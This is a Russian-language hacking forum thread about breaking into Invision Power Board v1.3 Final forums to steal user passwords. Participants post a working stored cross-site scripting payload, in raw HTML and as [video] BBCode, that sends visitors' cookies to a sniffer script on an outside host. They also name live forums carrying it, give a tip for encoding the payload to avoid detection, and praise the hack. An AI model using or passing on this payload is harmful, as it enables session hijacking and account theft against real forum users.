Вопрос про уязвимости в Invision Power Board(U) v1.3 Final
 

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team


На таких форумах баги есть ???
надо вытащиьт пароль юзера (хоть в хэше)

Ура! я нашёл эту тему у вас.... мне хотелось бы найти информацию по этой версии... хоть чтонибуть. спасибо.

Давече в логах снифера видел куки с такоко форома ...
Обыскался куда туда можно вставить скрипт снифера ... не нашёл ... подскажите кто знает ...

2 Майор
А где это форум???
Ссылку дай!

из того форума скрипт потёрли сразу ...
но вот ещё один :
http://offklan.lamkam.net/forum/index.php?showtopic=26 (на этой стронице скрипт)

вот пост :
<!-- THE POST 152 -->
<div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:docum ent.images[12].src=&quot;http://antichat.ru/cgi-bin/s.jpg?&quot;+document.cookie) <i>А</i> если я буду писать раз в неделю нормально будет ? </div>
<!-- THE POST -->
ща буду разбираться ..... , кстате объясните кто знает, что значит символ "`" в html (мне кажется что это что то типо "goto" в С++ ) ???

Вот так выглядит скрипт :

[video]http://1.ru e=` [/video]` style=display:none;background:url(javascript:docum ent.images[10].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie) No smoking

"No smoking" - в место это текст
Если в 10 кодировке зделать, то ваще без палева :)

Это значит что форум взломан =))) молодец чувак! Уважуха!

вот только не навсех пашет =\... почему? уже пропатчены? версия таже... хмммм...

Например тут непашет =\ http://www.overdose.ru/forum/index.php

Там просто отключены теги вставления видео, картинок в пост, причём в некоторых форумах кнопка на тегу [video] убрана, но она работает...